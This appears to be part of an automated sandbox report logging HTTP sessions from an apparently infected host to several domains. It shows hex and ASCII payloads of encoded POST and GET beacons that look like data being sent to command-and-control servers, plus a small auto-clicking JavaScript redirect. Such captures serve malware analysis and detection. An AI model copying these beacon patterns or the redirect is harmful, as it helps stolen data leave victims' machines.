                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              65192.168.11.204983127.124.4.24680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:49.971379042 CET487OUTGET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.laohub10.net
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:59:50.274688959 CET533INHTTP/1.1 200 OK
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Cache-Control: max-age=86400
                                                                                                                                                                              Age: 1
                                                                                                                                                                              Connection: Close
                                                                                                                                                                              Content-Length: 358
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              66192.168.11.204983246.30.211.3880
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:55.518316031 CET761OUTPOST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 72 33 56 54 59 6a 6e 4c 61 68 39 46 6e 6d 72 73 39 6d 46 34 70 6e 49 32 42 66 6b 47 4e 43 6f 58 71 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
                                                                                                                                                                              Jan 11, 2025 03:59:55.740731955 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              67192.168.11.204983346.30.211.3880
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:58.266012907 CET781OUTPOST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 55 45 46 76 64 75 50 41 70 4d 33 47 52 6a 65 49 4d 30 2b 4e 32 4d 65 5a 4c 36 39 33 55 58 2f 6b 6b 3d
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
                                                                                                                                                                              Jan 11, 2025 03:59:58.492043972 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              68192.168.11.204983446.30.211.3880
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:00:01.016321898 CET2578OUTPOST /uf7y/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              Origin: http://www.bankseedz.info
                                                                                                                                                                              Referer: http://www.bankseedz.info/uf7y/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 67 42 59 6e 52 44 48 33 52 51 48 33 79 51 75 50 39 39 56 4d 57 6b 61 77 33 51 64 56 4f 51 59 30 59 47 6c 65 36 4c 6e 6d 44 6f 58 72 7a 55 35 45 73 57 59 47 6c 64 64 38 2f 69 5a 69 7a 36 79 7a 30 6c 4e 32 2f 50 66 76 79 69 56 6c 79 6f 4f 59 7a 42 39 70 67 46 63 46 75 77 44 42 58 6e 33 4e 46 4c 69 68 37 46 59 4a 2f 68 4e 34 79 74 52 34 46 30 39 47 64 41 59 62 2f 52 68 56 72 71 61 56 44 73 41 52 32 75 55 48 55 47 56 32 47 69 68 49 4c 4d 69 30 53 31 70 72 57 49 6b 78 46 52 52 66 74 6a 42 61 49 35 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdgBYnRDH3RQH3yQuP99VMWkaw3QdVOQY0YGle6LnmDoXrzU5EsWYGldd8/iZiz6yz0lN2/PfvyiVlyoOYzB9pgFcFuwDBXn3NFLih7FYJ/hN4ytR4F09GdAYb/RhVrqaVDsAR2uUHUGV2GihILMi0S1prWIkxFRRftjBaI5NlMtsTxL80LGa9XfZodUUKAw9wecK0G6Bhl1vMaxm5glg3RDBvZplqHDNBZsVUkHBYd2+F0oaunxUkn44eiT8FRFCZmGAA3637UlJDr0HUJqr45BKAtUkb95M3tqJ5OSeFzn2lbmYJw+Jkk1CMX+KRhqP68QexGyIKvF4tzf28lO3Q4bknuSfPv5Psv/sSKG8tJB1WGwX2VtuSCVsHwl1yCbbl4pDK40QJ0rVRio/RHS8NMTHCVdMrwd8aBf+21eea8ZCIbKkXnmVJIaY925vYAhZZmAFqDEzag+xuIWhtJDVGKm1HO3H5PLC1ZjBvNvsN3GFdfPjSQu9CaDmgt5VRBZe5+r5KizFYBbbvnwqaICf0fJncqUBQfm9O78vy8gKStIPt/ub8FhQNua2BY4p+SLTCvb9jHZVg7wLInFYPBDK1qjN7Y7Q1EsRwZuRj882cpymHvZyGGoOnZMOMTkYCwHeiZs4xYdRjFcme4Bqtvx5cnncFKWdOVt25NXUqtxD/LoCGQQe1hvVxGo9sI1AwvH2I7LdfzMOHR24HYRYc+RLJXSevKocgKX6Kr4U6JF8MKD9dzQQnI+EnvRaxAwPVtdP7+HwVCCa6kUa04XFtOXlHKbqI8OYdRKCcJXQ972JFrYFQ4bLB3RYnvpyigq3Db8pxP63dS3a6 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 04:00:01.016346931 CET2578OUTData Raw: 61 46 4f 63 7a 2f 61 73 7a 76 43 47 45 4c 66 67 76 35 52 48 6c 4d 74 2b 39 66 6c 4b 72 58 50 6c 69 4b 64 4c 31 4a 4f 62 39 45 2b 4e 5a 4c 31 6f 57 59 69 65 75 6f 79 42 7a 79 45 45 55 4b 4c 69 42 68 70 71 6c 39 61 78 66 6f 65 72 56 62 33 6b 44 55
                                                                                                                                                                              Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
                                                                                                                                                                              Jan 11, 2025 04:00:01.016426086 CET2774OUTData Raw: 78 39 67 4d 6b 72 6c 45 64 4d 47 6c 77 6f 66 53 77 4c 30 5a 50 43 33 62 7a 44 58 7a 77 71 6f 4f 32 76 38 66 42 4b 68 78 62 45 4c 45 73 4e 69 58 68 48 30 51 68 4d 76 63 31 67 32 53 58 34 5a 47 2b 69 55 53 5a 79 4a 64 77 53 31 6b 50 43 4b 68 30 78
                                                                                                                                                                              Data Ascii: x9gMkrlEdMGlwofSwL0ZPC3bzDXzwqoO2v8fBKhxbELEsNiXhH0QhMvc1g2SX4ZG+iUSZyJdwS1kPCKh0xbdzGrgF9UfApy9vQzWVR64Z++YaypnnDF8guL3x3Cwmzkwy+Ke1uuKaW7rBpAXECmKYlgluJu7FSCF0w0Jp4pxpgpeNs3Kr8Q4s28xNR8jj2omXDSHSV5dc9SgaP2ASc5sokqMFrra5RjT3txxrkEXh/bQNifihdU
                                                                                                                                                                              Jan 11, 2025 04:00:01.238326073 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:00:01 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              69192.168.11.204983546.30.211.3880
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:00:03.765655041 CET489OUTGET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.bankseedz.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 04:00:03.991146088 CET738INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                              Date: Sat, 11 Jan 2025 03:00:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Content-Length: 564
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              70192.168.11.2049837103.224.182.24280
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 04:00:09.172243118 CET749OUTPOST /3iym/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.madhf.tech
                                                                                                                                                                              Origin: http://www.madhf.tech
                                                                                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 73 56 4a 53 30 4e 59 58 62 47 48 63 6f 4d 70 7a 37 37 67 78 75 57 78 38 66 46 53 6d 66 37 78 58 79 67 3d 3d
                                                                                                                                                                              Data Ascii: iS=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
                                                                                                                                                                              Jan 11, 2025 04:00:09.346985102 CET871INHTTP/1.1 200 OK
                                                                                                                                                                              date: Sat, 11 Jan 2025 03:00:09 GMT
                                                                                                                                                                              server: Apache
                                                                                                                                                                              set-cookie: __tad=1736564409.2393264; expires=Tue, 09-Jan-2035 03:00:09 GMT; Max-Age=315360000
                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                              content-length: 576
                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                              connection: close
